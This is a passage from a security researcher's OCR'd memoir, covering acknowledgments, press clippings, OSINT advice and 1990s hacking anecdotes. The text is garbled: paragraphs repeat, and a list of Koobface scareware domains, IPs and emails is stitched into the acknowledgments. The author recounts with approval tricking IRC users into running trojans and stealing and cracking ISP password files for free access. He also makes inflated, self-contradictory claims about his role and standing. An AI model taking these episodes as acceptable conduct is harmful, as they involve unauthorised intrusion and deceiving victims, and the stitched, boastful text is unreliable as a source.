llieva while | was studying in the Netherlands. 


- Pascal Mittner - for being the second coolest boss ever in the world who | never really had the 
chance to meet personally but was properly doing my work and where | was actually getting 
paid to do my work 


- Gary Scott - with whom | had the privilege to exchange data and information during the 90’s 
on my way to produce a high-quality newsletter and actually threat intelligence type of brief 
for ScanSafe at the time which later on got acquired by Cisco 


- Gadi Evron - for keeping it cool and for keeping the spirit and actually inspiring me to do my 
research while | was busy watching one of his personal presentations at a major security event 
circa the 90’s where he had the opportunity to present 


- Paul Ferguson - for keeping it cool and for keeping in touch an for actually inspiring me to do 
my research into the field of cybercrime research through his daily publications at his personal 
blog 


- Alex Eckelberry - for keeping it cool and corporate and for actually inspiriting me to do my 
research in the field of cybercrime research and for running and maitaining Sunbelt Software 
which greatly inspired me to do my research in the field of cybercrime research 


- Mark Rash - for keeping it cool and for inspiriting me to do my reserch into the field of cyber- 
crime research with his column at SecurityFocus 


- Jamie Riden - for being a good professional and someone that | trust and know and for assisting 
me in several occassions to do my research and continue doing my research 


- Steve Santorelli - for personally inviting me to attend an invite-only event and for keeping in 
touch and for keeping it cool and for personally writing me a personal recommendation based 
on my research and experience in the industry 


- James McQuaid - for being among the few individuals to actually raise awareness on the 
existence of the Russian Business Network and for continuing to supply high-profile and high- 
value threat intelligence information on a variety of mailing lists 


- Jeffrey Bardin - for inviting me to join Treadstone71 as an OSINT Analyst and to actually allow 
me to work with him on a several projects where | actually earned the necessary amount to 
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The second scareware domain pushed by the Koobface during the last 24 hours, 
gotrioscan .com/?uid=13301 - 91.212.107.103 - momorule@gmail.com redirects to plazec 
.info/22/?uid=13301 - 91.212.107.103 - Email: bebrashe@gmail.com where the [17]scareware 
is served. Parked at the same IP is the rest of thescareware domains portfolio pushed by 
Koobface: 


in5id .com 

in5ch .com 
goscanback .com 
goscanlook .com 
gofatescan .com 
goeachscan .com 
gobackscan .com 
goironscan .com 
gotrioscan .com 
ia-pro .com 
iantivirus-pro .com 
iantiviruspro .com 
windoptimizer .com 
woptimizer .com 
in5cs .com 


wopayment .com 
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pay some of my bills and properly invest in several projects including to lauch one of the first 
commercial E-Shops for intelligence deliverables 


- Jeffrey Carr - for keeping it cool and for expressing his personal gratitude and commenting 
on my research in the context of “keeping it coming”. - Ken Dunham - for keeping it cool 
and for running a high-profile and popular mailing list for security trends and actual technical 
information on current and ongoing cyber attack trends 


- Jart Armit - for keeping it cool and for approaching me several times to say “hi” and “keep up 
the good work” 


- Robert McMillan - for being a true professional and a good friend with whom | had the privilege 
and speak and communicate on a numerous occassions 


- Rob Lemos - for being a good proffessional and someone that | Know and have worked with 
and whose work I’ve followed in the past 


- Gregg Keizer - for being a true professional and for actually bothering to quote me and refer- 
ence me in several articles on numerous occassions - Gary Warner - for being a true professional 
and for being always on the front lines of fighting the bad guys and cybercrime internationally 


- Jorge Mieres - for being a true threat intelligence and cybercrime research professional and 
for keeping it cool in terms of new research and for offering a unique and in-depth overview 
and perspective on new and novel cyber attack trends and threats 


- Marcus Sachs - for keeping it cool and for being a true professional whose work I’ve followed 
in the past 


- Gunter Ollman - for being a true professional and a good friend with whom | actually got the 
chance to meet at RSA Europe 2012 The World is small and infinite and we can definitely make 
it a better place by doing our work following the basic methodology that an “OSINT conducted 
today is a tax payer’s buck saved somewhere”. 


It used to be a privilege back in December, 2005 when | originally launched my personal Dan- 
cho Danchev’Blog - Mind Streams of Information Security Knowledge which quickly emerged as 
one of the security industry’s most popular security publications up to present day where I’ve 
managed to attract approximatelly 5.6M page views throughout the past decade and where 
I’ve managed to attract and retain a high-quality audience which basically consists of secu- 
rity researchers members of the U.S Intelligence Community including U.S Law Enforcement 
including prominent members of the security industry where my personal blog became a daily 
read for the purpose of setting up the foundations of a successful communication platform for 
most of the research that | publish online. 


Following approximately a decade of active security blogging OSINT analysis and research 
including threat intelligence research and analysis I’ve managed to gather a loyal audience 
which greatly contributed to my 11,000 Twitter followers count using my old Twitter account - 
https://twitter.com/danchodanchev including the active participation of my old Twitter account 
ina Top Secret GCHQ Program known as "Lovely Horse" where | had the privilege to contribute 
with knowledge and know-how to the U.S Intelligence Community’s project for using "Open 
Source for Security" where the ultimate goal was to monitor high-profile hackers and security 
experts in terms of obtaining access to their research and knowledge. 


Throughout the past decade it’s been a personal privilege and an honor to produce hundreds 
of high-quality and never-published before high-quality cybercrime research and OSINT type 
of articles where I’m proud to find out that countless and numerous online publications and 
security and research journals including mainstream security news outlets have referenced or 
actually written an article about my research and actual research findings. 
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It used to a moment in time when Digg including Techmeme and let’s don’t forget Technorati 
were among the primary sourced of traffic and actual content aggregators and syndicating ser- 
vices online which greatly inspired me and motivated me to launch a personal blog which later 
on became the security industry’s leading and most high-traffic visited and popular security 
publications online. In that specific moment in time when | originally launched my personal 
blog daily blogging and actual security research was a daily routine which greatly contributed 
to the popularity of my personal blog in terms of traffic and the actual acquisition of high-profile 
and loyal readers across the years which is where I’ve decided to launch my personal Dancho 
Danchev’s Blog - Mind Streams of Information Security Knowledge blog. 


It used to be a perfect moment in time when everything was just beginning to take place in the 
world of hacking in particular the resurrection and re-emergence of key hacking and security 
resources and online portals online offering vast access to training and teaching documents and 
text files including actual security and hacking tools which be easily utilized for both defensive 
and offensive purposes both for educational purposes only. 


With major scene information repositiories and hacking sites going down the landscape greatly 
re-transformed itself into a commercial landscape re-transforming the scene the way we know 
it into a commercial paradise in particular the rise of the Threat Intelligence and Virtual CY- 
BERINT marketplace consisting of thousands of active participants sharing data information 
and knowledge on current and emerging cyber threatsd and cyber threat attack vectors in- 
cluding a multitude of nation-state sponsored and tolerated Cyber Threat Actor adversaries 
successfully running a huge portion of fraudulent and malicious online campaigns and partici- 
pating in a multi-million dollar underground Cybercrime Ecosystem. 


The year is 1998 and Progenic’s Top 100’s has just added yet another hacking group’s portfolio 
such as for instance among my favorite hacking and security resources which included at the 
time - Warlndustries, System7, Blackcode, Progenic. Web Fringe, Neworder and TechnicalWar- 
fare. What was really taking place within the Scene and the Industry at the time? With new 
hacking and community projects continuing to pop-up on a daily basis it wasn’t largely a sur- 
prise that a new generation of novice and amateur hackers was just beginning to take place 
with vast repositiories of tools and tutorials including articles and guides publicly accessible for 
everyone to take advantage of and most importantly to get in touch with someone and to learn. 
What did we managed to achieve throughtout the past decade in terms of innovation develop- 
ment knowledge and data spreading to thousands of novice and experienced users across the 
globe? Let’s take for instance the Threat Intelligence market segment - a pioneering passive 
and active virtual SIGINT marketplace with hundreds of groups participating including thou- 
sands of malicious and fraudulent online actors utilizing and relying on basic quality assurance 
and malicious economies of scale type of market-driven factors to scale their cybercrime and 
fraud-driven operations online prompting a systematic and nation-state driven response to a 
growing set of economic and financial terrorism type of online activity largely provoked by a 
specific set of Russian and Eastern European online adversaries. Among my favorite personal 
Web site bookmarks at the time were the NBA.com including various other X-Files and related 
UFO-themed video and photo archive type of personal Web sites. Believe it or not among the 
early basics of Technical Collection that | managed to inquire were throught the public and pro- 
prietary research published by a company called iDefense which was basically always there to 
provide the necessary intelligence on current and future cyber groups and current and future 
cyber actors which greatly inspired me on my way to do my research in the field of OSINT (Open 
Source Intelligence) and later on Cybercrime Research and Threat Intelligence gathering. Who 
were the hackers and what were they up to? What tools did they use? How famous were they 
at the time? How did they manage to achieve all of this? Remember the U.S-China crashed 
airplance skirmish? If it’s going to be massive it better be good 
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What this incident clearly showcased at the time is the possible offensive cyber warfare sce- 
nario where U.S based and China-based hackers actually popped-up online to defend and actu- 
ally launch attacks against each other potentially signifying one of the first major international 
cyber incidents at the time. With TextFiles.com additions continuing to pop-up among the first 
and most notable sections that truly made me an impression and actually inspired me to get 
involved in the world of Hacking and basically the Scene was the Anarchy and Phreaking and 
Hacking sections next to the daily visits to Progenic.com Top100 list of hacking and security 
Web sites to actually catch up with the votes and check the new additions to the list to poten- 
tially obtain various hacking tools and trojan horses futher motivating me to work with them 
and potentially show them and share them with some of my closest friends of the time circa 
the 90’s for the purpose of attempting to trick irc.dal.net users from various channels including 
#gay and #lesbians into accepting the latest bogus "screensaver" while exploiting a common 
flaw in the actual mIRC client where you could easily make it look like that the actual user is 
receiving an image which in reality was actually an executable part of the server client of a 
popular trojan horse release at the time. 


It used to be a moment in time when “sharing was caring” and with the booming Web 2.0 
enterprises and the actual concept numerous new online participants and Web 2.0 darlings 
started popping up as mushrooms another set of individuals prone to make a change an impact 
quickly emerged online potentially sharing a treasure trove of personal knowledge into the 
world of modern technologies including the very basics of information security hacking and 
cyber warfare including a newly releases and never-published before research into the area of 
cybercrime research and the actual process of profiling the bad guys online in terms of their 
actual campaigns and actual malicious infrastructure behind their online campaigns. 


It used to be a personal privilege back in December, 2005 when | originally launched my per- 
sonal Dancho Danchev’s Blog Mind Streams of Information Security Knowledge blog which 
quickly attracted a high-quality and relevant audience which is currently one of the security 
industry’s most popular and relevant security hacking OSINT and threat intelligence includ-ing 
cybercrime research type of gathering online publications where I’ve continued to publish and 
post high-quality and never-publshed before and released research and analysis articles. 


At some point in time | got practically used to getting referenced and quoted by mainstream 
news media in terms of my research which greatly motivated an inspired me to continue doing 
my research an to actually attempt to inspire other researchers and readers to continue reading 
and visiting my blog on a daily basis where | owe everyone a big deal of thanks for the daily 
visits and for actually bothering to read my articles and actually go through my research at the 
time up to present day. 


Dancho Danchev is the world’s leading expert in the field of cybercrime fighting and threat 
intelligence gathering having actively pioneered his own methodlogy for processing threat in- 
telligence leading to a successful set of hundreas of high-quality anaysis and research arti- 
cles published at the industry’s leading threat intelligence blog - ZDNet’s Zero Day, Dancho 
Danchev’s Mind Streams of Information Security Knowledge and Web-root’s Threat Blog with 
his research featured in Techmeme, ZDNet, CNN, PCWorld, SCMagazine, TheRegister, NYTimes, 
CNET, ComputerWorld, H+Magazine currently producing threat intelligence at the industry’s 
leading threat intelligence blog Dancho Danchev’s Blog - Mind Streams of Information Security 
Knowledge. 


With his research featured at RSA Europe, CyberCamp, InfoSec, GCHQ and Interpol the re- 
searcher continues to actively produce threat intelligence at the industry’s leading threat intel- 
ligence blog - Dancho Danchev’s - Mind Streams of Information Se-curity Knowledge publishing 
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a diverse set of hundreds of high-quality research analysis detailing the malicious and fraudu- 
lent activities at nation-state and malicious actors across the globe. 


Sample public mainstream news media research references and published articles include: 
Research and News Articles covering my research and refer-encing me throughout - 2008: 
Russian hacker ‘militia’ mobilizes to attack Georgia 

Fraudsters Target Facebook With Phishing Scam 

Fake Microsoft e-mail contains Trojan virus 

Hackers expand massive IFRAME attack to prime sites 

Hackers infiltrate Google searches 

Hackers expand massive IFrame attack to prime sites 

Hackers knocked Comcast.net offline 

Adobe investigates Flash Player attacks 

High-tech bank robbers phone it in 

Attackers booby-trap searches at top Web sites 

Carpet bombing networks in cyberspace 

Storm worm e-mail says U.S. attacked Iran 

India’s underground CAPTCHA-breaking economy 

Domain Name Record Altered to Hack Comcast.net 

Google searchers could end up with a new type of bug 

Ongoing IFrame attack proving difficult to kill 

Hackers expand massive IFRAME attack to prime sites 

Danchev: The small pack Web malware exploitation kit 

Danchev: Massive SQL injection the Chinese way 

CAPTCHAs are dead - new research from Dancho Danchev confirms it 
Hackers infiltrate Google searches 

Massive faux-CNN spam blitz uses legit sites to deliver fake Flash 

Faked CNN spam blitz pushes fake Flash 

Danchev: Anti-fraud site DDOS attack 

Sony PlayStation site victim of SQL-injection attack 

Fake CNN Alert Still Soreading Malware 

Look Ma, I’m on CIA.gov 

Research and News Articles covering my research and refer-encing me throughout - 2009: 
“In gaz we trust”: a fake Russian energy company facilitat-ing cybercrime 
Don’t pay your ransom via SMS 

NYT scareware scam linked to click fraud botnet 

Danchev: A crimeware developer’s to-do list 
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Danchev rained on my scareware campaign 
Is “aggregate-and-forget” the future of cyber-extortion? 
NYT scareware scam linked to click fraud botnet 
Microsoft declares war on ‘scareware’ 
Don’t pay your ransom via SMS 
Twitter warms up malware filter 
What’s really the safest Web Browser? 
With Unrest in Iran, Cyber-attacks Begin 
Zeus bot found using Amazon’s EC2 as C &C server 
Research and News Articles covering my research and refer-encing me throughout - 2010: 
Firefox add-on encrypts sessions with Facebook, Twitter 
Watch out for malware with those pretty Mac screensavers 
Months-old Skype vulnerability exploited in the wild 
Danchev: Money mule recruiters 
Cybercrime’s bulletproof hosting exposed 
Malware Threatens to Sue BitTorrent Downloaders 
Firefox add-on encrypts sessions with Facebook, Twitter 
Chuck Norris Botnet Karate-chops Routers Hard 
Research and News Articles covering my research and referencing me throughout - 2011: 
Has EV-SSL Growth Been Slow? 
Report: Vishing Attack Targets Skype Users 
Research and News Articles covering my research and refer-encing me throughout - 2012: 
Fake UPS notices deliver malware 
ZeuS/Zbot Trojan Spread Through Rogue US Airways Email 
New Skype malware threat reported: Poison Ivy 
Five Koobface botnet suspects named by New York Times 
Virtual jihad: How real is the threat? 
Is the death knell sounding for traditional antivirus? 
Can the Nuclear exploit kit dethrone Blackhole? 
Experts split over regulation for bounty-hunting bug snif-fers 
Spammers Using Fake YouTube Notifications to Peddle Drugs 
Adele Bests Adderall As Affiliate Soammers Offer Music Downloads 
Bulgarian sleuth unveils botnet operators 
Fake PayPal Emails Distributing Malware 
Web Gang Operating in the Open 
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ZeuS/Zbot Trojan Spread Through Rogue US Airways Email 

Buy 500 hacked Twitter accounts for less than a pint 

NBC.com Hacked, Infected With Citadel Trojan 

Research and News Articles covering my research and refer-encing me throughout - 2013: 
How Much Does A Botnet Cost? 

Automated YouTube account generator offered to cyber crooks 
Upgraded Modular Malware Platform Released in Black Market 
Deconstructing the Al-Qassam Cyber Fighters Assault on US Banks 
NBC hack infects visitors in ‘drive by’ cyberattack 

Bitcoins are being traded for hack tools 

New DIY Google Dorks Based Hacking Tool Released 

Hacking The TDoS Attack 

Mass website hacking tool alerts to dangers of Google dorks 
Cybercrime service automates creation of fake scanned IDs 
Spammers unleash DIY phone number slurping web tool 

Spam email contains malware, not Apple gift card 

APT1, that scary cyber-Cold War gang: Not even China’s best 

Mass website hacking tool alerts to dangers of Google dorks 

C &C PHP script for staging DDoS attacks sold on under-ground forums 
Russian Malware-as-a-Service Offers Up Server Rentals for $240 a Pop 
Java exploit kit sells for $40 per day 

Buggy DIY botnet tool leaks in black market 

New DIY Google Dorks Based Hacking Tool Released 

Botnets for rent, criminal services sold in the underground market 
Spam email contains malware, not Apple gift card 


It used to be a moment in time when we used to "rock the boat". With or without the drinks. 
Following a successful career as a hacker enthusiast during the 90’s and a successful man- 
agement and operation of one of the World’s leading portals for hackers and security experts 
which is https://astalavista.com for a period of three years circa 2003-2006 when | originally 
decided to launch one of the security industry’s leading publication which is my personal blog - 
https://ddanchev.blogspot.com | managed to somehow land a successful career as an indepen- 
dent contractor in the world of security blogging cybercrime research and threat intelligence 
which led me to visit several invite-only conferences including to present at event at an undis- 
closed location including to actually attract and retain approximatelly 6M page views which is 
not necessarily bad for a man one operation in terms of running and maintaining my personal 
blog for a period of 12 years. 


Among the primary reasons for coming up with this 97 pages long personal memoir is to em- 
power fellow researchers and security experts including the general public with an in-depth 
personal account overview of my experience in the security industry’s as a teenage hacker 
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enthusiast back in the 90’s today’s most popular and often cited security blogger threat in- 
telligence analyst and cybercrime researcher internationally and to present a diverse set of 
high-quality and never-published and discussed before case studies and enriched technical in- 
formation and OSINT data on current and emerging cyber attack trends. The primary goal of 
the book would be to position my memoir as one of the most popular and often cited personal 
account of the hacking and the security Scene circa the 90’s through the prism of my teenage 
hacker experience up to present day in terms of various high-profile and advanced nation-state 
actors and malicious and fraudulent cyber attack campaigns where the ultimate goal would be 
to discuss in-depth my experience in the field of security blogging threat intelligence gather- 
ing and cybercrime research throughout the past decade. It used to be a moment in time 
when “sharing was caring” and with the booming Web 2.0 enterprises and the actual concept 
numerous new online participants and Web 2.0. 


darlings started popping up as mushrooms another set of individuals prone to make a change 
an impact quickly emerged online potentially sharing a treasure trove of personal knowledge 
into the world of modern technologies including the very basics of information security hacking 
and cyber warfare including a newly releases and never-published before research into the area 
of cybercrime research and the actual process of profiling the bad guys online in terms of their 
actual campaigns and actual malicious infrastructure behind their online campaigns. It used 
to be a personal privilege back in December, 2005 when | originally launched my personal 
Dancho Danchev’s Blog - Mind Streams of Information Security Knowledge blog which quickly 
attracted a high-quality and relevant audience which is currently one of the security industry’s 
most popular and relevant security hacking OSINT and threat intelligence including cybercrime 
research type of gathering online publications where I’ve continued to publish and post high- 
quality and never-published before and released research and analysis articles. 


At some point in time | got practically used to getting referenced and quoted by mainstream 
news media in terms of my research which greatly motivated an inspired me to continue doing 
my research an to actually attempt to inspire other researchers and readers to continue reading 
and visiting my blog on a daily basis where | owe everyone a big deal of thanks for the daily 
visits and for actually bothering to read my articles and actually go through my research at the 
time up to present day. Tracking down and monitoring the Koobface botnet on a daily basis 
where | successfully became the primary source of information on the Koobface botnet at the 
time was quite a success and a pretty interesting experience where | ultimately managed to 
take it offline including to held a Keynote presentation on the topic of monitoring and tracking 
down of the Koobface botnet 


| originally started my primary area of occupation which is OSINT (Open Source Intelligence) 
back in December, 2005 when | originally launched my personal blog while stuyding in the 
Netherlands and working for - https://astalavista.com following and greatly inspired by the in- 
famous “What use are they? They’ve got over 40,000 people over there reading newspapers.” 
- President Nixon on the CIA in terms of utilizing public and open sources of information for do- 
ing research and actually be capable of gathering and working on with intelligence materials. 
It used to be a moment in time when | originall witnessed the rise of one of the most powerful 
tools on the Internet which is Google in terms of research compared to a situation approxi- 
matelly over a decade ago when you had to use several different engines at the same time on 
your way to find valuable information. Today’s rise of Google in terms of modern and real-time 
search technology is an impressive tool in the arsenal of everyone doing research and aiming 
to gather information and intelligence for their project that also includes the use of the search 
engine for various OSINT related purposes. OSINT in the context of fighting cybercrime can 
be best described as the systematic and persistent use of public information for the purpose 
of building a cyber threat intelligence enriched data sets and intelligence databases both for 
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real-time situational awareness and historical OSINT preservation purposes which also include 
to actually "connect the dots" in cybercrime gang and rogue cyber actor campaigns and cyber 
attack type of campaigns. A general example would consist of obtaining a single malicious 
software sample and using it on a public sandbox to further map the infrastructure of the cy- 
bercriminal behind it potentially exposing the big picture behind the campaign and connecting 
the dots behind their infrastructure which would lead to a multi-tude and variety of personally 
identifiable information getting exposed which could help build a proprietary cybercrime gang 
activity database and actually assist LE in tracking down the prosecuting the cybercriminals 
behind these campaigns. The primary idea here is to locate free and public online repositories 
of malicious software and to actually obtain a sample which will be later on used in a public 
sandbox for the purpose of mapping the Internet-connected infrastructure of the cybercrime 
gang in question including to actually elabore more on the ways they attempt to monetize the 
access to the compromised host including possibly ways in which they make money including 
to actually find out what exactly are they trying to compromise 


Possible examples here include VirusTotal or actually running a malware interception honeypot 
such as for instance a spam trap which would allow you to intercept currently circulating in 
the wild malare campaigns that propagate using email and actually analyze them in terms 
of connecting the dots exposing their Internet-connected infrastructure and establishing the 
foundations for a successful career into the world of malicious software analysis and cybercrime 
research. The next logical step would be to properly assess and analyze the recently obtained 
sample and to properly establish the foundation of a "connect the dots" culture within your 
organization where the primary goal would be to have researchers and analysts look for clues 
on their way to track down and monitor a specific campaign potentially coming up with new and 
novel cyber attack attribution research. Visualization is often the key to everything in terms of 
visualizing threats and looking for additional clues and possible cyber attack attribution clues 
where a popular visualization and threat analysis tool known as Maltego should come into play 
which basically offers an advanced and sophisticated way to process OSINT and cybercrime 
research and threat intelligence type of information and actually enrich it using public and 
proprietary sources of information for the purpose of establishing the big picture and actually 
connecting the dots for a specific cyber attack campaign. Among the first things that you 
should consider before beginning your career in the World of OSINT is that everything that 
you need to know about a specific online event a specific online campaign that also includes 
the activities of the bad guys online is already out there in the form of publicly accessible 
information which should be only processed and enriched to the point where the big picture for 
a specific event or a malicious online campaign should be established using both qualitative 
and quantitative methodologies that also includes the process of obtaining access to the actual 
technical details and information behind a specific online event or an actual malicious and 
rogue online campaign. Among the few key things to keep in mind when doing OSINT including 
actual OSINT for cyber attack and cyber campaign attack attribution is the fact that in 99 % 
of the cases all the collection information that you need in terms of a specific case is already 
publicly known and is publicly accessible instead of having to obtain access to a private or 
a proprietary source of information and the only thing that you would have to do to obtain 
access to it is to use the World’s most popular search engine in terms of collection processing 
and enrichment 


The second most popular thing to keep in mind when doing OSINT is that you don’t need to 
obtain access to proprietary even public OSINT tools.Following a series of messages left on the 
actual C &C (Command and Control) server locations which were basically greeting me and ref- 
erencing my research at the time including a series of typosquatted domains using my name 
at some point in time | managed to actually come up with a proper "Top 10 Things You Didn’t 
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Know About the Koobface Gang" article for ZDNet at the time wheret the botnet masters actu- 
ally left a message within the C &C (Command and Control) server location basically answering 
the key points on a point by point basis which was quite a success at the time of monitoring 
and tracking down the Koobface botnet. 


At a specific moment in time | got a personal invitation for a corporate project to work on 
using a full-time contract with Webroot Inc which was basically an extremely popular and easy 
to use and effective endpoint and corporate anti-virus solution where | had the privilege to 
work as a security blogger for a period of two years where | produced hundreds of high-profile 
and high-value research analysis on the topic of cybercrime research and malicious software 
analysis and research which ultimately led to me to visit InfoSec 2012 with my employer where 
| held several presentations and actually responded to journalist inquiries about our current 
and ongoing research. Throughout my two years experience while working for Webroot is that 
| had the privilege to meet some professional folks with whom | had the privilege to work 
and collaborate including to actually get a pretty good commentary on my research including 
to actually attend RSA Europe 2012 including InfoSec 2012 on behal of my employer for the 
purpose of helding two presentations which were on the basics of Cyber Jihad vs Cyberterrorism 
including a general overview of trends within the cybercrime ecosystem where | got some 
pretty interesting questions from folks attending the presentation and actually got the chance 
and privilege to meet most of the U.S and U.K’s team members. I’ve also managed to produce 
approximately 1224 pages of blog posts offering and providing actionable intelligence on some 
of the current and emerging cyber threats at the time which basically consisted of malware 
spam and phishing campaigns including a general overview of the cybercrime ecosystem in 
the context of offering additional insight into some of the currently active and in circulation 
tools of the trade within the cybercrime ecosystem at the time. 


Sample Personal Photo of ZDNet’s Zero Day Blogger Dancho Danchev. Imagery courtesy of 
Dancho Danchev 


This is Dancho (https://ddanchev.blogspot.com) and I’ve decided to share my personal real- 
life story circa the 90’s when | was a prominent ex-Bulgarian hacker during the infamous 
hacker spree during the 90’s when Astalavista.box.sk and Progenic.com were my primary and 
daily visit type of bookmarks which greatly provoked me to pursue a basically 20 year long 
career as an information security specialist today’s world’s leading expert in the field of cy- 
bercrime research and threat intelligence gathering that’s been maintaining one of the secu- 
rity industry’s leading and most popular security publications since December, 2005 which 
is my personal blog which | originally launched while working as a Managing Director for 
https://astalavista.com which at the time was one of the world’s most popular and high-traffic 
visited information security portals in the world where | had the privilege to work as a Managing 
Director while studying in the Netherlands. 


Do you want to know about my real-life story as an ex-Bulgarian hacker during the 90’s? Are 
you interested in learning more about how we set up the foundation of the Technical Collection 
market segment including today’s modern threat intelligence market segment and how we set 
them straight using data information and knowledge which was produced and disseminated? 
Keep reading. 


The story takes place in a small town in Bulgaria during the 90’s in a post Soviet and post 
Communist country where modern technologies slowly start to take place prompting a local 
whiz kid to gather as much information from a network of connected computers known as the 
Internet for the purpose of seeking a global domination through active and persistent informa- 
tion sharing exchange with colleagues from across the globe including exclusively the United 
States and members of the U.S Security Industry the Scene and prominent members of the 
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U.S Intelligence Community including hundreds of independent contractors in a post and pre 
9/11 World which is where Dancho Danchev originally began his career as a hacker enthusiast 
today’s leading expert in the field of cybercrime research and threat intelligence gathering. 


While | was in Bulgaria during my teenage hacker years | was busy freelancing as an infor- 
mation security consultant while working with international security portals where | was busy 
offering advice and practical information security advice and practical solution recommenda- 
tions including my work with ClO.bg where | once contributed with an article on Cyberterrorism 
and Cyber Jihad including a series of publications for HiComm.bg where | was running a popular 
information security rubric and participated with several articles in several of the magazine’s 
issues. 


At a later stage | somehow decided to go corporate an in a way find a way to enter the commer- 
cial information security industry with my knowledge potentially beginning to contribute with 
knowledge and information using my personal contacts at various information security portals 
on my way to land a possible job preferably as a writer security blogger or a journalist which 
| apparently succeeded in doing as I’ve been actively contributing with my own research and 
knowledge on a variety of h/c/p/a (Hacking/Cracking/Phreaking/Anarchy) portals at the time. 


At some point in time Dancho decide to approach the primary operator of one of his favorite 
security Web sites at the time — https://net-security.org for the purpose of contributing with an 
article for their newly launched forbidden.net-security.org project. His idea was to contribute 
with a security article for their recently launched Newsletter and the article in question was 
a good old-fashined “How to use trojan horses” manual. The article eventually got accepted 
and Dancho felt proud of himself for making a contribution to the project and having his article 
published so that eventually more people will read it and send him an email with questions 
about trojan horses and the actual article. The primary Webmaster of net-security.org at the 
time was Berislav Kucan and the project still remains one of Dancho’s favorite and most popular 
visited security Web site on a daily basis. 


At a later stage | decided to establish a working relationship with Frame4 Security Systems 
which is a Dutch-based company for the purpose of writing an improved version of the original 
“How to use trojan horses” paper which later on became the “The Complete Windows Trojans 
Paper” which quickly became one of the Scene’s most popular and highly read paper on modern 
trojan horses and how to use them and how to protect against them. 


With the summer coming to an end Dancho got an offer to begin to work at the local office of his 
ISP (Internet Service Provider) which at the time was Digital Systems for the position of office 
assistant where he was responsible for introducing new clients to the ISP’s service offering and 
for processing invoices. Among the key benefits for working at the local ISP office was the 
actual bandwidth that he got access to allowing him to access the Internet without any sort of 
limitations which he used to visit some of his favorite Top50 and Top100 security and hacking 
Web sites where he eventually downloaded some of the most recently released hacking and 
security tools including trojan horses which he copied on a floppy disk and eventually brought 
back home during the lunch break for the purpose of exchanging the information with his 
second employer at the time which was an anti-trojans vendor using a publicly accessible FTP 
server for the purpose of helping his employer improve the detection rate for these type of 
programs and trojan horses. Dancho would then receive a payment for having collected and 
actually shared these programs and trojan horses which he would use to pay the bills at the 
time and actually pay for using his ISP’s service. 


At some point in time he eventually got approached by a guy known as HeLLfiReZ who was in- 
terested in working with him and actually sharing his collection of trojan horses which he would 
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then also share with his employer which at the time was LockDownCorp and earn revenue in 
the process. It would later come to his attentio that the guy that approached him was actually 
one of the key members of the infamous Sub7 trojan horse group which at a particual point in 
time was responsible for launching a DDoS (Distributed Denial of Service) attack against the 
researcher Steve Gibson who extensively profiled the campaign and actually had a conversa- 
tion with HeLLfiReZ and his team members for the purpose of finding out how launched the 
attack and how it took place. 


He would eventually run a personal hacking and secutity Web site archive using hosting cour- 
tesy of his employer LockDownCorp and run a popular Hacking and Security Web site which 
he would then feature on Progenic.com’s Top100 Hacking and Security Web sites including to 
actually offer paid security consultations in terms of finding out ways to help people protect 
their home PCs from trojan horses and teaching them how to use a firewall and how they can 
secure their home PCs. 


At a later stage in his early Information Security career he would visit and join 
https://itsecurity.com’s Security Clinic where he would have his personal biography featured 
and actually respond to common security questions which users of the Web site will submit 
and have his response featured on the front page potentially driving traffic to his employer 
at the time which was Frame4 Security Systems and actually improving his knowledge and 
understanding of Information Security in general. 


Dancho was also known for having participated in the Blackcode Ravers hacking group which 
was running the popular https://blackcode.com Web site at the time and actually participated 
with two issues of a popular Security Newsletter at the time which were featured on the home 
page of the portal. 


During the glorious years of IRC (Internet Relay Chat) where Dancho was busy hanging on 
several IRC networks including DALNet and his local country’s IRC network he managed to 
obtain the /etc/shadow password file for his entire ISP (Internet Service Provider) which at the 
tim was Digital Systems and shared a copy of it with his best friend at the time George Kadiyski 
for the purpose of using several popular and high-profile Wordlists including John the Ripper 
password cracker potentially obtaining access and brute-forcing the entire password list for 
hundreds of active dial-up Internet based accounts at the time. Over a period of several days 
the results at the time were outstanding in the context of actually succeeding in the brute- 
forcing process potentially allowing Dancho and his friend to easily access free Internet based 
dial-up accounts which at the time cost money allowing them to use the Internet for free. 


At a later stage Dancho also managed to obtain access to his local town’s competing ISP (In- 
ternet Service Provider) which was known as BIANet /etc/shadow which was send to him by 
a friend and he also once again shared it with his friend who would once again begin brute- 
forcing the password file using a variety of Worldlists and the infamous John the Ripper passwor 
cracking tool at the time potentially allowing Dancho and his friend easy access to unlimited 
Internet based dial-up connectivity. 


The time has come to play a game. Dancho quickly powered his 16-bit Pravetz PC 2MB RAM 
and a screen full of computer game choices quickly appeared prompting him to choose a game. 
While loading a relatively known game known as Scorch Dancho decided to play two hours and 
then proceed with meeting his friends and start a discussion with his grandma. A huge fan of 
strategy games Dancho decided that he didn’t have the time to dedicate to play his favorite 
game — Sid Meier’s Civilization and instead he figured that he would eventually play the game 
later throughout the day. Playing Scorch was quite an experience and he took a few hours of 
his precious learning time to interact with the game. He then decided to approach his best 
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friend at the time and co-conspirator in the World of UFO’s the Soviet Union and computer 
games including the hacking Scene for two hours of extensive game play where we would 
strategize on how to best “approach” the Soviet Union in terms of invasion actively and carefully 
planning every move on our way to invade the Soviet Union and eventually all the surrounding 
countries. While | was busy preparing for our several hour game play George was supposed to 
be busy going through a CD which was basically a mirror of Packetstormsecurity in particular 
the E-Zine section so that we can prepare to have a conversation in terms of working out our 
technological and military strategy on our way to achieve global domination in the original Sid 
Meier’s Civilization. What we basically did in the beginning was to strategize and actually get a 
better view of the technology tree of the game and while | was busy moving the Empire along 
George was busy keeping notes on our way to keep track and advance out military strategy on 
a “first come first serve” basis. 


Provoked by the need to reach out to a vast network of computers known as the Internet 
— Dancho quickly decided that the time has come to get connected — so that he decided 
to seek a proper connection provider in his local home-town. Back in the day the primary 
connection providers in the time were Bulgaria’s Digital Systems BIA Net and the country’s 
leading mobile connectivity provider — Mtel’s pre-paid dial-up cards. Times were different in 
terms of connectivity and DSL and ADSL were a dream come true in the face of corporate 
networks properly utilizing and using ISDN type of based connectivity. Keeping it simple — 
Dancho decided to quickly acquire the necessary dial-up modem — which he would eventually 
fall in love with potentially reaching out to a vast network of computers known as the Internet 
using the help of a local dial-up provider known as Digital Systems. Back in the day — hourly 
based dial-up access meant think twice about what you do and how you do it online which 
means that | would have to basically prepare a plan for the things that I’ll do online including 
Web sites which | would have to visit including a set of emails which | would have to send to a 
set of people including friends and colleagues. 


It’s been years since he prepared to acquire a personal computer and get connected meaning 
that he managed to prepare a list of Web sites and newsgroups on the topic of hacking and com- 
puter security including general Web sites that he would eventually visit. Among the first Web 
sites that he visited was NBA.com where he would quickly learn about the latest developments 
